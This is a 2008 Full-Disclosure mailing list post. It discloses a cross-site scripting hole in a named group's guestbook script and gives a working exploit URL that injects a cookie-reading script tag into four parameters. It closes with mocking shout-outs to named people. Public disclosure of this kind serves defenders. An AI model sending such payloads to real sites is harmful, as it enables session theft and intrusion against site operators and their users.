[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Xc0re Security Research Group GuestBook xss

To: full-disclosure@xxxxxxxxxxxxxxxxx, submit@xxxxxxxxx
Subject: [Full-disclosure] Xc0re Security Research Group GuestBook xss
From: "bug squash" <bugsquashr@xxxxxxxxx>
Date: Thu, 4 Sep 2008 16:05:38 -0400

##############################################################
#
#   Name    :   Xc0re Security Research Group GuestBook Xss
#   Author  :   El Chubacabra's Baby's Mama
#   Homepage :  http://www.xc0re.net/
#
##############################################################


Google dork: http://www.xc0re.net/

vulnerable - guestbook.cgi - comments, url, email, name parameters

Exploit:
http://www.xc0re.net/cgi-sys/guestbook.cgi?user=xc0rnet&action=addguest&basehref=http%3A%2F%2Fxc0re.net&template=default&name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&email=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&url=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&comments=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E

sHoUtZ:
Lame ass Muhammad Usman Saeed [Security Consultant] and Zainab Pervez

"Submit your material now ! ;)
23-05-2008
Send all submissions like vulnerabilities , Papers &/or any thing
related to security ! at submit@xxxxxxxxx !
All the material submitted would be displayed on our website with its
original author's name !"

>you got it pal!

And to my main man HUSSIN X - the most l33t h4x0r on the planet and
possibly the solar system.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] Google Chrome Browser Vulnerability
Next by Date: Re: [Full-disclosure] Hardcoded Keys
Previous by thread: [Full-disclosure] [ GLSA 200809-04 ] MySQL: Privilege bypass
Next by thread: [Full-disclosure] [ MDVSA-2008:186 ] python
Index(es):
- Date
- Thread